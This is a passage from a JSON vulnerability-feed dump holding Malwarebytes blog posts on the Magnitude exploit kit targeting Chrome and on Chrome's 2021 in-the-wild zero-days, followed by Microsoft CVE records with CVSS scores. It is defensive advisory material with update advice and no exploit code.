compromised websites and its payload of choice is the [Magniber ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/07/magniber-ransomware-improves-expands-within-asia/>). \n\n### The vulnerabilities\n\n[CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>) is described as a type confusion in V8 in Google Chrome prior to 90.0.4430.85 which allows a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. V8 is Google's open source high-performance JavaScript and WebAssembly engine. This vulnerability was [patche](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html>)[d in April](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html>).\n\n[CVE-2021-31956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31956>) is a Windows NTFS Elevation of Privilege (EoP) vulnerability. This vulnerability can be used in combination with CVE-2021-21224 to escape the Chromium sandbox. This vulnerability was [patched in June](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956>).\n\n### PuzzleMaker\n\nPractically the same combination of vulnerabilities [was described in June](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>) when Microsoft fixed seven zero-days, including the CVE-2021-131956 we mentioned earlier. Back then, the attacker using these vulnerabilities was dubbed PuzzleMaker. At the time it was unknown which Chrome vulnerability was used by the attacker, but it's highly likely that it was the same as Magnitude has been found leveraging now.\n\n### Payload\n\nThere is no malicious payload attached to the Magnitude exploits yet, the attack just exfiltrates the victim's Windows build number. But reportedly, this is Magnitude EK\u2019s standard procedure to test out new exploits, so this could change quickly if they start to see positive results.\n\n### How to protect yourself\n\nIt is only on rare occasions that we write about vulnerabilities and then tell you there isn\u2019t much to worry about. But in this case, the only people that have anything to worry about are Windows users that browse the web using Chrome or Chromium based browsers (like Edge), but have disabled its automatic updates and haven\u2019t updated since April. You would also have to run on a non-updated Windows system since June, or run Chrome with the _-no-sandbox _switch (not recommended). And even then all that would happen if you ran across the Magnitude EK (which usually focuses on South Korea) is getting fingerprinted.\n\nBut you do understand that you should update your OS and browser nonetheless, right?\n\n### Enable automatic updates\n\nIf you want to save yourself the trouble of manually installing updates, there are a few things you can do. For Google Chrome (under Windows) you can choose this page as one of the tabs that opens when you run the browser: _chrome://settings/help_. If there has been an update since the last time you closed your browser, this page will alert you and initiate a download of the update.\n\nIn Windows 10 you can select the Start button, then select _Settings > Update & security > Windows Update_. Select _Advanced options_, and then under _Choose how updates are installed_, select _Automatic (recommended)_.\n\nStay safe, everyone!\n\nThe post [Chrome targeted by Magnitude exploit kit](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/magnitude-ek-has-been-spotted-targeting-the-chrome-browser/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-21T12:47:42", "type": "malwarebytes", "title": "Chrome targeted by Magnitude exploit kit", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-131956", "CVE-2021-21224", "CVE-2021-31956"], "modified": "2021-10-21T12:47:42", "id": "MALWAREBYTES:3322D6B92554507E3E44D06E2BA5E174", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/magnitude-ek-has-been-spotted-targeting-the-chrome-browser/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-14T18:35:22", "description": "Google _[announced](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>)_ on Monday that it will be issuing patches for 11 high severity vulnerabilities found in Chrome, including two that are currently being exploited in the wild. The patch, which is part of the Stable Channel Update for Chrome 93 (93.0.4577.82), will be released for Windows, Mac, and Linux (if it hasn\u2019t already). Chrome users are expected to see the roll out in the coming days and weeks.\n\nReaders should note that other popular browsers such as Brave and Edge are also Chromium-based and therefore likely to be vulnerable to these flaws too. Keep an eye out for updates.\n\nYou can check what version of Chrome you are running by opening About Google Chrome from the main menu.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2021/09/latest-chrome-stable-600x458.png)The About Google Chrome screen tells you what version you are running and whether it is up to date\n\n### The vulnerabilities\n\nThe fixes address high severity vulnerabilities reported to Google by independent researchers from as early as August of this year. That said, the company has included names of the researchers who found the flaws in their announcement.\n\nThe two vulnerabilities that are being actively exploited\u2014namely, [CVE-2021-30632](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30632>) and [CVE-2021-30633](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30633>)\u2014were submitted anonymously. The former is an "Out of bounds write" flaw in the V8 JavaScript engine and the latter is a "Use after free" bug in the Indexed DB API.\n\nBecause threat actors are currently exploiting the two aforementioned vulnerabilities, Google provides little to no information on how the attacks against these weaknesses are being carried out, or other precautionary measures users should be looking out for. Per Google:\n\n> Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed.\n\n### V8, the thorn in Chrome's side?\n\nNobody will be surprised to see that one of the in-the-wild exploits affects Chrome's V8 engine. \n\nAt the heart of every modern web browser sits a JavaScript interpreter, a component that does much of the heavy lifting for interactive web apps. In Chrome, that interpreter is V8. These components need to accommodate frequent updates and adhere to a bewildering array of web standards, while also being both fast and secure.\n\nChrome's [V8](<https://v8.dev/>) JavaScript engine has been a significant source of security problems. So significant in fact, that in August Microsoft\u2014whose Edge browser is based on Chrome\u2014announced an experimental project called [Super Duper Secure Mode](<https://blog.malwarebytes.com/reports/2021/08/edges-super-duper-secure-mode-benchmarked-how-much-speed-would-you-trade-for-security/>) that aims to tackle the rash of V8 problems by simply turning an important part of it off.\n\nA little under half of the CVEs issued for V8 relate to its Just-in-Time (JIT) compiler, and more than half of all \u2018in-the-wild\u2019 Chrome exploits abuse JIT bugs. Just-in-time compilation is an important performance feature and turning it off is a direct trade of speed for security. How much? According our quick-and-dirty testing, turning off the JIT compiler makes JavaScript execution twice as slow in Edge.\n\n### 11 zero-days and counting\n\nTo date, the Google Chrome team has patched 11 zero-day vulnerabilities in 2021. Previous patches are from the following vulnerabilities, some of which we have covered here in the Malwarebytes Labs blog:\n\n * [_CVE-2021-21148_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/02/update-now-chrome-patches-zero-day-that-was-exploited-in-the-wild/>)\n * [_CVE-2021-21166_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/>)\n * CVE-2021-21193\n * [_CVE-2021-21206_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/04/update-now-chrome-needs-patching-against-two-in-the-wild-exploits/>)\n * [_CVE-2021-21220_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/04/update-now-chrome-needs-patching-against-two-in-the-wild-exploits/>)\n * CVE-2021-21224\n * CVE-2021-30551\n * CVE-2021-30554\n * CVE-2021-30563\n\nWith so much bad PR, you might expect Chrome's market share to suffer; yet, it remains by far the most popular browser. Users\u2014and the Google Chrome brand\u2014seem unaffected.\n\nMake sure you update your Chrome or Chromium-based browser once you see the patch available, or better still, make sure your browser is set to [update itself](<https://support.google.com/chrome/answer/95414?hl=en-GB&co=GENIE.Platform%3DDesktop#:~:text=Go%20to%20'About%20Google%20Chrome,Chrome%20to%20apply%20the%20update.>).\n\nStay safe!\n\nThe post [Update now! Google Chrome fixes two in-the-wild zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-google-chrome-fixes-two-in-the-wild-zero-days/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T16:28:47", "type": "malwarebytes", "title": "Update now! Google Chrome fixes two in-the-wild zero-days", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633"], "modified": "2021-09-14T16:28:47", "id": "MALWAREBYTES:390E663F11CA04293C83488A40CB3A8A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-google-chrome-fixes-two-in-the-wild-zero-days/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-03-17T02:34:09", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31199.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31201", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:09", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31201.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31199", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:07", "description": "Microsoft Defender Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft Defender Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31985"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31985", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31985", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:08", "description": "Windows Remote Desktop Services\u00c2 Denial of Service Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows Remote Desktop Services\u00a0Denial of Service Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31968"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31968", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-17T02:34:09", "description": "Microsoft DWM Core Library Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft DWM Core Library Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33739"], "modified": "2021-06-14T07:00:00", "id": "MS:CVE-2021-33739", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:11", "description": "Windows Kernel Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31955", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31955", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-17T02:34:19", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n\nThis vulnerability was addressed in Microsoft Edge (Chromium-based) in build 90.0.818.41 which was released April 16, 2021.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-22T20:16:16", "type": "mscve", "title": "Chromium: CVE-2021-21224 Type Confusion in V8", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224"], "modified": "2021-04-22T20:16:16", "id": "MS:CVE-2021-21224", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21224", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:11", "description": "Windows NTFS Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows NTFS Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31956", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-17T02:34:09", "description": "Windows MSHTML Platform Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows MSHTML Platform Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33742"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-33742", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:10", "description": "Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26420, CVE-2021-31966.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft SharePoint Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31963", "CVE-2021-31966"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31963", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:10", "description": "Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26420, CVE-2021-31963.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft SharePoint Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31963", "CVE-2021-31966"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31966", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31966", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:12", "description": "Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31963, CVE-2021-31966.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft SharePoint Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31963", "CVE-2021-31966"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-26420", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26420", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-09-21T18:18:37", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31199.\n\n \n**Recent assessments:** \n \n**architect00** at June 09, 2021 